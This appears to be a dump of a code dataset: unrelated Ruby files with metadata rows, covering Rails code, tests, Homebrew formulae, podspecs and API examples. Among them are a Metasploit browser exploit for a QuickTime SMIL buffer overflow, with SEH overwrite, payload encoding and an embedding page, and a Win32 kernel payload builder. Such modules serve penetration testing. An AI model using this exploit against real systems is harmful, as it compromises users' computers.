hosts.map { |host| stub_request(:get, "http://#{host}:9999/ping").to_return(status: 204) }
end
it "balance requests" do
(hosts.size * cycle).times { subject.ping }
stubs.cycle(cycle) { |stub| expect(stub).to have_been_requested.times(cycle) }
end
end
end
| 27.186992 | 96 | 0.579844 |
089e98db805c9931103e68824adde6a6590393b0 | 382 | module ApplicationHelper
def current_user
if(user_id=session[:user_id])
@current_user ||=User.find_by(id:user_id)
elsif (user_id=cookies.signed[:user_id])
user=User.find_by(id:user_id)
if user && user.authenticated?(cookies[:remember_token])
log_in_user(user)
@current_user=user
end
end
end
def log_in_user(user)
session[:user_id]=user.id
end
end
| 19.1 | 59 | 0.725131 |
ac1ad92ec1479591db233568b10055ef3fc4a6ab | 1,581 | # -*- coding: binary -*-
module Rex
module Payloads
module Win32
require 'rex/payloads/win32/kernel/common'
require 'rex/payloads/win32/kernel/recovery'
require 'rex/payloads/win32/kernel/stager'
require 'rex/payloads/win32/kernel/migration'
module Kernel
#
# Constructs a kernel-mode payload using the supplied options. The options
# can be:
#
# Recovery : The recovery method to use, such as 'spin'.
# Stager : The stager method to use, such as 'sud_syscall_hook'.
# RecoveryStub : The recovery stub that should be used, if any.
# UserModeStub : The user-mode payload to execute, if any.
# KernelModeStub: The kernel-mode payload to execute, if any.
#
def self.construct(opts = {})
payload = nil
# Generate the recovery stub
if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
end
# Append supplied recovery stub information in case there is some
# context specific recovery that must be done.
if opts['AppendRecoveryStub']
opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
end
# Generate the stager
if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
payload = Kernel::Stager.send(opts['Stager'], opts)
# Or, generate the migrator
elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
payload = Kernel::Migration.send(opts['Migrator'], opts)
else
raise ArgumentError, "A stager or a migrator must be specified."
end
payload
end
end
end
end
end
| 28.745455 | 83 | 0.714105 |
7a4a1e4777b63e87f4cdf77ca77964b8bfbad6c4 | 607 |
Pod::Spec.new do |spec|
spec.name = "DropDownMeun"
spec.version = "0.0.1"
spec.summary = "一个快速集成的下拉筛选控件"
spec.description = <<-DESC
基于 OC 实现的下拉筛选控件
DESC
spec.homepage = "https://github.com/iOS-PPG/DropDownMeun"
spec.license = "MIT"
spec.author = { "PPG" => "[email protected]" }
spec.platform = :ios
spec.platform = :ios, "7.0"
spec.source = { :git => "https://github.com/iOS-PPG/DropDownMeun.git", :tag => "#{spec.version}" }
spec.source_files = "Classes", "DropDownMeun/Classes/**/*.{h,m}"
end
| 25.291667 | 106 | 0.558484 |
28281210401768999e55f8c44b5008670dd9d537 | 367 | require 'formula'
class Vcsh < Formula
homepage 'https://github.com/RichiH/vcsh'
url 'https://github.com/RichiH/vcsh/archive/v1.20130724-homebrew.tar.gz'
version '1.20130724'
sha1 '3cda5c059bbe40fbd55ff8d0d74dd9f327a15da2'
depends_on 'mr'
def install
bin.install 'vcsh'
man1.install 'vcsh.1'
end
test do
system "#{bin}/vcsh"
end
end
| 18.35 | 74 | 0.705722 |
e9245724f718c7efc5d686dbe179b65ea4e90f3b | 956 | {
matrix_id: '1454',
name: 'boneS01',
group: 'Oberwolfach',
description: 'Oberwolfach: 3D trabecular bone',
author: 'B. van Rietbergen, E. Rudnyi, J. Korvink',
editor: 'E. Rudnyi',
date: '2006',
kind: 'model reduction problem',
problem_2D_or_3D: '1',
num_rows: '127224',
num_cols: '127224',
nonzeros: '5516602',
num_explicit_zeros: '1198550',
num_strongly_connected_components: '1',
num_dmperm_blocks: '1',
structural_full_rank: 'true',
structural_rank: '127224',
pattern_symmetry: '1.000',
numeric_symmetry: '1.000',
rb_type: 'real',
structure: 'symmetric',
cholesky_candidate: 'yes',
positive_definite: 'yes',
notes: 'Primary matrix in this model reduction problem is the Oberwolfach K matrix
',
aux_fields: 'M: sparse 127224-by-127224
B: sparse 127224-by-1
C: sparse 3-by-127224
cname: full 3-by-8
', image_files: 'boneS01.png,boneS01_graph.gif,',
}
| 28.969697 | 86 | 0.661088 |
212b6c4654de2e3e24bc39a766d824496b3afb14 | 594 | # frozen_string_literal: true
module ActiveRecord # :nodoc:
# = Active Record \Serialization
module Serialization
extend ActiveSupport::Concern
include ActiveModel::Serializers::JSON
included do
self.include_root_in_json = false
end
def serializable_hash(options = nil)
if self.class._has_attribute?(self.class.inheritance_column)
options = options ? options.dup : {}
options[:except] = Array(options[:except]).map(&:to_s)
options[:except] |= Array(self.class.inheritance_column)
end
super(options)
end
end
end
| 23.76 | 66 | 0.683502 |
b90e3dfd75e8781f7c1416603318db05c4f2a60e | 624 | Spree::Sample.load_sample("orders")
order = Spree::Order.last
inventory_unit = order.inventory_units.first
stock_location = inventory_unit.find_stock_item.stock_location
return_item = Spree::ReturnItem.create(inventory_unit: inventory_unit)
return_item.exchange_variant = return_item.eligible_exchange_variants.last
return_item.build_exchange_inventory_unit
return_item.accept!
customer_return = Spree::CustomerReturn.create(
stock_location: stock_location,
return_items: [return_item]
)
order.reimbursements.create(
customer_return: customer_return,
return_items: [return_item]
)
| 28.363636 | 75 | 0.796474 |
6ac63df452d863836bb64bdd210d68c8e13f62ad | 4,650 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking # needs more testing/targets to be Great
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Seh
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:os_name => OperatingSystems::WINDOWS,
:javascript => true,
:rank => NormalRanking, # reliable memory corruption
:vuln_test => nil,
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Apple QuickTime
7.6.6. When processing a malformed SMIL uri, a stack-based buffer
overflow can occur when logging an error message.
},
'Author' =>
[
'Krystian Kloskowski', # original discovery
'jduck' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2010-1799' ],
[ 'OSVDB', '66636'],
[ 'BID', '41962' ],
[ 'URL', 'http://secunia.com/advisories/40729/' ],
[ 'URL', 'http://support.apple.com/kb/HT4290' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 640, # 716 - 63 - 8 - 5
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",
},
'Platform' => 'win',
'Targets' =>
[
#[ 'Automatic', { } ],
[ 'Apple QuickTime Player 7.6.6',
{
'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Aug 12 2010',
'DefaultTarget' => 0))
end
def on_request_uri(client, request)
return if ((p = regenerate_payload(client)) == nil)
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
print_status("Sending exploit SMIL (target: #{target.name})")
# This is all basically filler on the browser target because we can't
# expect the SEH to be in a reliable place across multiple browsers.
# Heap spray ftw.
off = 716
start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"
scheme = rand_text_alphanumeric(5)
sploit = ''
sploit << scheme
sploit << "://"
# payload
sploit << p.encoded
# pad to SEH
sploit << rand_text_english(off - sploit.length - start.length)
# seh frame
sploit << generate_seh_record(target.ret)
# jmp back to payload
distance = off + 8 - (8 + start.length)
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string
# force exception while writing
sploit << rand_text(1024) * 15
smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">
<body>
<img src="#{sploit}" />
</body>
</smil>
|
send_response(client, smil, { 'Content-Type' => "application/smil" })
else
print_status("Sending initial HTML")
shellcode = Rex::Text.to_unescape(p.encoded)
url = ((datastore['SSL']) ? "https://" : "http://")
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
url << ":" + datastore['SRVPORT'].to_s
url << get_resource
fname = rand_text_alphanumeric(4)
content = "<html><body>"
content << <<-ENDEMBED
<OBJECT
CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"
WIDTH="1"
HEIGHT="1"
CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">
<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">
<PARAM name="AUTOPLAY" VALUE = "true" >
<PARAM name="TYPE" VALUE = "video/quicktime" >
<PARAM name="TARGET" VALUE = "myself" >
<EMBED
SRC = "#{url}/#{fname}.qtl"
QTSRC = "#{url}/#{fname}.qtl"
TARGET = "myself"
WIDTH = "1"
HEIGHT = "1"
AUTOPLAY = "true"
PLUGIN = "quicktimeplugin"
TYPE = "video/quicktime"
CACHE = "false"
PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >
</EMBED>
</OBJECT>
ENDEMBED
content << "</body></html>"
send_response(client, content, { 'Content-Type' => "text/html" })
end
# Handle the payload
handler(client)
end
end
| 28.703704 | 116 | 0.592688 |
f8d7819fb15d8b0378bd975eba72cab2d61f27a5 | 1,278 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START logging_v2_generated_ConfigService_UpdateCmekSettings_sync]
require "google/cloud/logging/v2"
# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::Logging::V2::ConfigService::Client.new
# Create a request. To set request fields, pass in keyword arguments.
request = Google::Cloud::Logging::V2::UpdateCmekSettingsRequest.new
# Call the update_cmek_settings method.
result = client.update_cmek_settings request
# The returned object is of type Google::Cloud::Logging::V2::CmekSettings.
p result
# [END logging_v2_generated_ConfigService_UpdateCmekSettings_sync]
| 37.588235 | 74 | 0.786385 |
5ddb48d9157be9134a47a7b02b7c40e785844b91 | 601 | Pod::Spec.new do |s|
s.name = "FHTTPClient"
s.version = "0.0.3"
s.license = { :type => 'Apache License, Version 2.0', :file => 'LICENSE' }
s.summary = "A simple iOS HTTP Client for REST services."
s.homepage = "https://github.com/furymobile/FHTTPClient"
s.author = { "Fury Mobile" => "[email protected]" }
s.source = { :git => "https://github.com/furymobile/FHTTPClient.git", :tag => "0.0.3" }
s.source_files = 'FHTTPClient/FHTTPClient/**/*.{h,m}'
s.ios.deployment_target = '5.0'
s.frameworks = 'Foundation'
s.requires_arc = true
end
| 42.928571 | 95 | 0.605657 |
f7fd8ecbc4a775651620310bd8bb7806f66d3e4d | 506 | cask "amd-power-gadget" do
version "0.6.6"
sha256 "2a09858baf24ea757fada5243c20c94bfc92054b6ba8dd04e0e77c423915fe96"
url "https://github.com/trulyspinach/SMCAMDProcessor/releases/download/#{version}/AMD.Power.Gadget.app.zip"
appcast "https://github.com/trulyspinach/SMCAMDProcessor/releases.atom"
name "AMD Power Gadget"
desc "Power management, monitoring and VirtualSMC plugin for AMD processors"
homepage "https://github.com/trulyspinach/SMCAMDProcessor"
app "AMD Power Gadget.app"
end
| 38.923077 | 109 | 0.79249 |
ed6708e2cee7b91d5ac5fc7abd72c7842308a7f2 | 817 |
module RabbitMQ
module FFI
class ConnectionTune < ::FFI::Struct
layout(
:channel_max, :uint16,
:frame_max, :uint32,
:heartbeat, :uint16
)
def self.id
:connection_tune
end
def id
:connection_tune
end
def apply(channel_max: nil, frame_max: nil, heartbeat: nil)
self[:channel_max] = Integer(channel_max) if channel_max
self[:frame_max] = Integer(frame_max) if frame_max
self[:heartbeat] = Integer(heartbeat) if heartbeat
self
end
def to_h(free=false)
{
channel_max: self[:channel_max],
frame_max: self[:frame_max],
heartbeat: self[:heartbeat]
}
end
def free!
end
end
end
end
| 20.425 | 65 | 0.53978 |
397933cb9ee2373caa9a6c21fedb1f675dff041e | 159 | class CreateAromas < ActiveRecord::Migration[5.2]
def change
create_table :aromas do |t|
t.string :aroma_name
t.timestamps
end
end
end
| 17.666667 | 49 | 0.672956 |
f8bde530c9f6a520a1522df7183d98b63ec3efdf | 2,771 | #!/usr/bin/env ruby
# Encoding: utf-8
#
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This example gets all campaigns. To add campaigns, run add_campaigns.rb.
require 'optparse'
require 'google/ads/google_ads'
def get_campaigns(customer_id)
# GoogleAdsClient will read a config file from
# ENV['HOME']/google_ads_config.rb when called without parameters
client = Google::Ads::GoogleAds::GoogleAdsClient.new
responses = client.service.google_ads.search_stream(
customer_id: customer_id,
query: 'SELECT campaign.id, campaign.name FROM campaign ORDER BY campaign.id',
)
responses.each do |response|
response.results.each do |row|
puts "Campaign with ID #{row.campaign.id} and name '#{row.campaign.name}' was found."
end
end
end
if __FILE__ == $0
PAGE_SIZE = 1000
options = {}
# The following parameter(s) should be provided to run the example. You can
# either specify these by changing the INSERT_XXX_ID_HERE values below, or on
# the command line.
#
# Parameters passed on the command line will override any parameters set in
# code.
#
# Running the example with -h will print the command line usage.
options[:customer_id] = 'INSERT_CUSTOMER_ID_HERE'
OptionParser.new do |opts|
opts.banner = sprintf('Usage: %s [options]', File.basename(__FILE__))
opts.separator ''
opts.separator 'Options:'
opts.on('-C', '--customer-id CUSTOMER-ID', String, 'Customer ID') do |v|
options[:customer_id] = v
end
opts.separator ''
opts.separator 'Help:'
opts.on_tail('-h', '--help', 'Show this message') do
puts opts
exit
end
end.parse!
begin
get_campaigns(options.fetch(:customer_id).tr("-", ""))
rescue Google::Ads::GoogleAds::Errors::GoogleAdsError => e
e.failure.errors.each do |error|
STDERR.printf("Error with message: %s\n", error.message)
if error.location
error.location.field_path_elements.each do |field_path_element|
STDERR.printf("\tOn field: %s\n", field_path_element.field_name)
end
end
error.error_code.to_h.each do |k, v|
next if v == :UNSPECIFIED
STDERR.printf("\tType: %s\n\tCode: %s\n", k, v)
end
end
raise
end
end
| 30.450549 | 91 | 0.694695 |
edbd48b9cf2fe4933fa700a4fe9111dd8deffe86 | 833 | require 'synapse/process_manager/correlation'
require 'synapse/process_manager/correlation_resolver'
require 'synapse/process_manager/correlation_set'
require 'synapse/process_manager/lock_manager'
require 'synapse/process_manager/pessimistic_lock_manager'
require 'synapse/process_manager/process'
require 'synapse/process_manager/process_factory'
require 'synapse/process_manager/process_manager'
require 'synapse/process_manager/process_repository'
require 'synapse/process_manager/resource_injector'
# Must be loaded after the resource injector
require 'synapse/process_manager/container_resource_injector'
require 'synapse/process_manager/simple_process_manager'
require 'synapse/process_manager/mapping/process'
require 'synapse/process_manager/mapping/process_manager'
require 'synapse/process_manager/repository/in_memory'
| 43.842105 | 61 | 0.87515 |
2137d96f746235e77802d290cedbed78503629d5 | 183 | # frozen_string_literal: true
ENV["BUNDLE_GEMFILE"] ||= File.expand_path("../Gemfile", __dir__)
require "bundler/setup" # Set up gems listed in the Gemfile.
require "bootsnap/setup"
| 30.5 | 65 | 0.748634 |
e9452f28c252a81731b6866e455d3b22e27c5435 | 1,894 | # frozen_string_literal: true
require File.expand_path("../lib/mail_catcher/version", __FILE__)
Gem::Specification.new do |s|
s.name = "mailcatcher"
s.version = MailCatcher::VERSION
s.license = "MIT"
s.summary = "Runs an SMTP server, catches and displays email in a web interface."
s.description = <<-END
MailCatcher runs a super simple SMTP server which catches any
message sent to it to display in a web interface. Run
mailcatcher, set your favourite app to deliver to
smtp://127.0.0.1:1025 instead of your default SMTP server,
then check out http://127.0.0.1:1080 to see the mail.
END
s.author = "Samuel Cochran"
s.email = "[email protected]"
s.homepage = "http://mailcatcher.me"
s.files = Dir[
"README.md", "LICENSE", "VERSION",
"bin/*",
"lib/**/*.rb",
"public/**/*",
"views/**/*",
] - Dir["lib/mail_catcher/web/assets.rb"]
s.require_paths = ["lib"]
s.executables = ["mailcatcher", "catchmail"]
s.extra_rdoc_files = ["README.md", "LICENSE"]
s.required_ruby_version = ">= 2.0.0"
s.add_dependency "eventmachine", "1.0.9.1"
s.add_dependency "midi-smtp-server", "~> 2.3.1"
s.add_dependency "mail", "~> 2.3"
s.add_dependency "rack", "~> 1.5"
s.add_dependency "sinatra", "~> 1.2"
s.add_dependency "sqlite3", "~> 1.3"
s.add_dependency "thin", "~> 1.5.0"
s.add_dependency "skinny", "~> 0.2.3"
s.add_development_dependency "coffee-script"
s.add_development_dependency "compass", "~> 1.0.3"
s.add_development_dependency "minitest", "~> 5.0"
s.add_development_dependency "rake"
s.add_development_dependency "rdoc"
s.add_development_dependency "sass"
s.add_development_dependency "selenium-webdriver", "~> 3.7"
s.add_development_dependency "sprockets"
s.add_development_dependency "sprockets-sass"
s.add_development_dependency "sprockets-helpers"
s.add_development_dependency "uglifier"
end
| 33.821429 | 83 | 0.689018 |
089ff25649049921d190d4010a39142c673a9d9c | 120 | module OpenFlashChart
class BarBase < Base
def attach_to_right_y_axis
@axis = 'right'
end
end
end
| 15 | 30 | 0.658333 |
620559093bf173899df68387fe5b798566fa76ee | 1,263 | module Fog
module AWS
class DynamoDB
class Real
# Get DynamoDB items
#
# ==== Parameters
# * 'request_items'<~Hash>:
# * 'table_name'<~Hash>:
# * 'Keys'<~Array>: array of keys
#
# ==== Returns
# * response<~Excon::Response>:
# * body<~Hash>:
# * 'Responses'<~Hash>:
# * 'table_name'<~Array> - array of all elements
# * 'UnprocessedKeys':<~Hash> - tables and keys in excess of per request limit, pass this to subsequent batch get for pseudo-pagination
# * 'ConsumedCapacity':<~Hash>:
# * 'TableName'<~String> - the name of the table
# * 'CapacityUnits'<~Float> - Capacity units used in read
#
# See DynamoDB Documentation: http://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_BatchGetItem.html
#
def batch_get_item(request_items)
body = {
'RequestItems' => request_items
}
request(
:body => Fog::JSON.encode(body),
:headers => {'x-amz-target' => 'DynamoDB_20120810.BatchGetItem'},
:idempotent => true
)
end
end
end
end
end
| 32.384615 | 147 | 0.517815 |
d574b9fa9d82cda28acc05394e5c361486ace85e | 1,145 | require "language/node"
class BashLanguageServer < Formula
desc "Language Server for Bash"
homepage "https://github.com/bash-lsp/bash-language-server"
url "https://registry.npmjs.org/bash-language-server/-/bash-language-server-3.0.4.tgz"
sha256 "88a676b6ad4dc6409a813588fd975a97f881b8f4c2bb4fcb3d4880302606dc2d"
license "MIT"
bottle do
root_url "https://github.com/gromgit/homebrew-core-mojave/releases/download/bash-language-server"
sha256 cellar: :any_skip_relocation, mojave: "58e20942d6fcd90bf7d78deba2b7c4d6f3473a2f8074318082eb76253cf369c5"
end
depends_on "node"
def install
system "npm", "install", *Language::Node.std_npm_install_args(libexec)
bin.install_symlink Dir["#{libexec}/bin/*"]
end
test do
json = <<~JSON
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"rootUri": null,
"capabilities": {}
}
}
JSON
input = "Content-Length: #{json.size}\r\n\r\n#{json}"
output = pipe_output("#{bin}/bash-language-server start", input, 0)
assert_match(/^Content-Length: \d+/i, output)
end
end
| 29.358974 | 115 | 0.672489 |
2143fe2e434170758a895262493daa7e8621733f | 171 | require 'active_support/lazy_load_hooks'
require 'web_console/engine'
require 'web_console/repl'
module WebConsole
ActiveSupport.run_load_hooks(:web_console, self)
end
| 21.375 | 50 | 0.836257 |
abbf44e6da25269221950d92fbf7f2b883bc5117 | 2,908 | module Rebels
class CreateService < ServiceBase
PreconditionFailedError = Class.new(StandardError)
attr_reader :rebel, :local_group, :source
def initialize(source: nil, local_group: nil)
@rebel = Rebel.new
@local_group = local_group
@source = source
end
def run(params = {})
context = {
params: params,
local_group: local_group,
source: source
}
catch_error(context: context) do
run!(params)
end
end
def run!(params = {})
@rebel.source = @source
@rebel.language ||= ENV['XR_BRANCH_DEFAULT_LANGUAGE']
case @source
when "admin"
@rebel.consent = true
@rebel.local_group ||= @local_group
@rebel.attributes = rebel_admin_params(params)
when "public"
@rebel.attributes = rebel_public_params(params)
end
validate_email_format! if @rebel.valid?
generate_token
delete_existing_rebel_if_no_local_group(@rebel.email)
@rebel.save!
Mailtrain::AddSubscriptionsJob.perform_later(@rebel)
true
end
def redirect_url
case @source
when "admin"
@rebel
when "public"
rebel.redirect || rebel.profile_url
end
end
private
# We prefer a new and clean signup than keeping an old record that is not
# linked to a local group
def delete_existing_rebel_if_no_local_group(email)
existing_rebel = Rebel.where(email: email, local_group_id: nil)&.take
if existing_rebel
Rebels::DeleteService.new(rebel: existing_rebel).run!
end
end
def generate_token
@rebel.token = SecureRandom.hex(16).to_i(16).to_s(36)
end
def rebel_admin_params(params)
params
.require(:rebel)
.permit(
:availability,
:email,
:interests,
:internal_notes,
:irl,
:language,
:local_group_id,
:name,
:notes,
:number_of_arrests,
:phone,
:postcode,
:regular_volunteer,
:status,
:tag_list,
:willingness_to_be_arrested,
skill_ids: [],
working_group_ids: []
)
end
def rebel_public_params(params)
params.require(:rebel).permit(
:availability,
:consent,
:email,
:language,
:local_group_id,
:name,
:notes,
:phone,
:postcode,
:redirect,
:tag_list,
:willingness_to_be_arrested,
:agree_with_principles,
skill_ids: [],
)
end
def validate_email_format!
if ValidatesEmailFormatOf::validate_email_format(rebel.email) == nil
true # email is valid
else
raise PreconditionFailedError,
_("Please double check the email address provided.")
end
end
end
end
| 23.836066 | 77 | 0.587001 |
91353d924a61c8efb7c0e8d520c91c28db5cb8ac | 273 | class CreateContactHistories < ActiveRecord::Migration
def self.up
create_table :contact_histories do |t|
t.integer :person_id
t.text :type
t.text :email
t.timestamps
end
end
def self.down
drop_table :contact_histories
end
end
| 17.0625 | 54 | 0.681319 |
79b76709ee76b7a2f21db0ba9c5ee91c9e7b7f8e | 616 | # frozen_string_literal: true
require 'kaminari/mongoid/mongoid_criteria_methods'
module Kaminari
module Mongoid
module MongoidExtension
module Document
extend ActiveSupport::Concern
include Kaminari::ConfigurationMethods
included do
scope Kaminari.config.page_method_name, Proc.new {|num|
limit(default_per_page).offset(default_per_page * ((num = num.to_i - 1) < 0 ? 0 : num))
} do
include Kaminari::Mongoid::MongoidCriteriaMethods
include Kaminari::PageScopeMethods
end
end
end
end
end
end
| 26.782609 | 99 | 0.655844 |
ff38f736936140511c782fa7b323772a4ae8c174 | 1,295 | class WidgetsController < ApplicationController
include PasswordRequired::ControllerConcern
password_required for: [:create, :update, :destroy],
with: ->(password) { password == 'password' }
before_action :set_widget, only: [:show, :edit, :update, :destroy]
# GET /widgets
def index
@widgets = Widget.all
end
# GET /widgets/1
def show
end
# GET /widgets/new
def new
@widget = Widget.new
end
# GET /widgets/1/edit
def edit
end
# POST /widgets
def create
@widget = Widget.new(widget_params)
if @widget.save
redirect_to @widget, notice: 'Widget was successfully created.'
else
render :new
end
end
# PATCH/PUT /widgets/1
def update
if @widget.update(widget_params)
redirect_to @widget, notice: 'Widget was successfully updated.'
else
render :edit
end
end
# DELETE /widgets/1
def destroy
@widget.destroy
redirect_to widgets_url, notice: 'Widget was successfully destroyed.'
end
private
# Use callbacks to share common setup or constraints between actions.
def set_widget
@widget = Widget.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def widget_params
params.require(:widget).permit(:name)
end
end
| 19.923077 | 73 | 0.668726 |
e2147c582fd93125edfd8a3b5ea481d0cdd24834 | 258 | class CreateObjectFieldOptions < ActiveRecord::Migration
def change
create_table :object_field_options do |t|
t.integer :object_field_id
t.string :name
t.string :description
t.string :value
t.timestamps
end
end
end
| 19.846154 | 56 | 0.689922 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.